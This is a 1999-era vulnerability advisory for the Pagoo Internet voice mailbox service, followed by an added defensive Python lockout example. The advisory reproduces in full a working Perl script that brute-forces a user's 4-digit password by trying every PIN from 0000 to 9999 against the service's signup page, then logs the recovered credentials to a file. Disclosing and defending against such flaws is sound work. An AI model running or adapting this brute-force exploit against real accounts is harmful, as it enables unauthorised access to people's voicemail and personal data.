Vulnerability

Pagoo (Pagoo Internet voice MailBox)

Affected

Those using Pagoo

Description

Elaich of Hhp posted the following Pagoo VMB remote exploit. This exploit will extract the password for the PagooID you specify. The vulnerability comes into play when you connect to your UpdateForm through signup.asp, which requires your PagooID and your 4 digit password. Nothing prevents you from reconnecting and trying a new password, starting at 0000 and incrementing by 1 until reaching 9999, which is the highest password possible. Exploit follows:

    #!/usr/bin/perl
    #
    # (hhp) hhp-pagoo.pl (hhp)
    # by: elaich of the hhp.
    # http://hhp.hemp.net/
    # '99'
    #
    # Logs passwds to file: pagooids

    use IO::Socket;

    die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
    ($box) = (@ARGV);
    open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
    autoflush OUT 1;
    $host = "www.pagoo.com";
    autoflush STDOUT 1;

    sub parse {
      ($num) = @_;
      $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
      $socket = IO::Socket::INET->new(PeerAddr => $host,
                                      PeerPort => 80,
                                      Proto    => "tcp")
        or die "Can't connect.\n";
      print $socket "GET $url\n";
      print "Trying password: $num of 9999.\n";
      while(<$socket>) {
        chomp;
        if(/Password invalid/) {
          break;
        }
        if(/First Name/) {
          print "PagooID password extracted...\n";
          print "PagooID: $box / Password: $num\n";
          print OUT "PagooID: $box / Password: $num\n";
          exit 0;
        }
      }
    }

    $num = '0000';
    parse $num;
    for($i = 0; $i <= 9999; $i++) {
      $num++;
      parse $num;
    }

Solution

Nothing yet.
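
One way to close the gap described above, shown as an added example that is not part of the original advisory or of Pagoo's code: a failure counter keyed on the account with a temporary lockout, so reconnecting for each try gains nothing. The class name, the limits and the sample account data are assumptions.

```python
import hmac
import time

MAX_FAILURES = 5            # assumed policy: failures allowed before lockout
LOCKOUT_SECONDS = 15 * 60   # assumed policy: lockout duration


class PinGuard:
    """Per-account failure counter. Keyed on the account, not the client
    connection, because the guessing described above reconnects every try."""

    def __init__(self, pins, clock=time.monotonic):
        self._pins = pins          # account id -> PIN (constructed sample store)
        self._clock = clock
        self._failures = {}        # account id -> consecutive failures
        self._locked_until = {}    # account id -> time the lock expires

    def check(self, account, pin):
        """Return 'ok', 'invalid' or 'locked'."""
        now = self._clock()
        if self._locked_until.get(account, 0) > now:
            return "locked"        # rejected without comparing the PIN at all
        expected = self._pins.get(account)
        # Constant-time comparison; unknown accounts are counted the same way.
        if expected is not None and hmac.compare_digest(expected, pin):
            self._failures.pop(account, None)
            return "ok"
        count = self._failures.get(account, 0) + 1
        self._failures[account] = count
        if count >= MAX_FAILURES:
            self._locked_until[account] = now + LOCKOUT_SECONDS
            self._failures[account] = 0
        return "invalid"


def guesses_before_lock(guard, account):
    """Feed sequential PINs 0000..9999 to the guard (local object only) and
    return how many were actually evaluated before 'locked' or 'ok'."""
    evaluated = 0
    for n in range(10000):
        result = guard.check(account, f"{n:04d}")
        if result == "locked":
            break
        evaluated += 1
        if result == "ok":
            break
    return evaluated
```

While the lock is active even the correct PIN returns "locked", so responses during that window reveal nothing about the password.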